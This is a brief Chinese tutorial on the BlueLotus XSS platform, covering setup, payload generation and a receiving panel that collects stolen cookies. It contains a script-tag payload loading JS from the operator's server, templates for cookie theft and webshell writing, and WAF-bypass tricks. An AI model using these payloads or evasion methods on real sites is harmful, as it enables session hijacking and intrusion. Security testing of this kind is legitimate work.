目录
[1. 安装步骤](#1. 安装步骤)
[1. 我的JS](#1. 我的JS)
[2. 公共模版](#2. 公共模版)
[3. XSS接收面板](#3. XSS接收面板)
一、BlueLotus简介
BlueLotus(蓝莲花)是一款功能强大的XSS漏洞测试与管理平台,它提供了一个集中化的管理后台,可以帮助安全研究人员高效地管理和利用XSS漏洞。
图1:BlueLotus平台界面
二、系统安装与配置
1. 安装步骤
-
下载BlueLotus最新版本
-
解压到Web服务器目录
-
访问安装向导页面
-
按照提示完成数据库配置
三、后台登录
访问后台登录地址(通常为http://192.168.21.4/BlueLotus/login.php),输入管理员账号密码。
图2:后台登录界面
四、核心功能使用
1. 我的JS
发现XSS漏洞后,可以在"漏洞管理"中添加记录:
-
点击"新增"
-
选择插入模版
-
生成payload
-
复制js内容
html
<script src="http://192.168.21.4/BlueLotus/myjs/alert.js"></script>图3:JS可进行编码
2. 公共模版
BlueLotus提供了多种预置的XSS攻击载荷:
-
弹框测试
-
Cookie窃取
-
网站截屏
-
写一句话木马
图4:公共模版界面
3. XSS接收面板
在左侧菜单点击"项目管理"→"添加项目",填写项目信息:
-
接收时间
-
接收IP
-
客户端
-
携带数据
将构造的JS,插入存在xss漏洞的网站
图5:收到的接收cookie信息
五、防御规避策略
对抗WAF技巧,内置绕过方案:
-
HTML标签变异(
<svg/onload=>) -
编码混淆(JSFuck/AAEncode)
-
分块传输编码